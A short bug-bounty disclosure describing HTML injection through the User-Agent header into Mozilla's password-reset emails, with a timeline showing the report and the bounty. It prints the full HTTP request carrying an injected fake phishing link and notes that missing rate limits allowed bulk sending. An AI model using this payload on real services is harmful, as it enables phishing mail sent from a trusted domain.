While testing Mozilla, I found it was possible to include HTML code and plaintext content in the password reset email coming from Mozilla.
When resetting the password on Mozilla, I found Mozilla includes browser, OS, and IP in its email notification. They were trying to parse the user-agent string into a readable device description from the request, but when no valid user-agent is provided then the whole string is taken as device description and then the string gets inserted into the email without any further sanity checks. This allows us to include HTML content into the email.
POST /v1/password/forgot/send_code HTTP/1.1 Host: api.accounts.firefox.com User-Agent: <br><br>This is fake message with fake <a href="http://phishing-url.com">http://phishing-url.com/</a><br><br> Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json Referer: https://accounts.firefox.com/ Content-Length: 597 Origin: https://accounts.firefox.com Connection: close data...
The email looks something like
There wasn’t any rate limit on password reset functionality. So, it was possible to send emails in bulk with relevant DKIM/SPF checks passing.
May 24, 2017 - Report Sent
Jun 13, 2017 - Bounty Awarded by Mozilla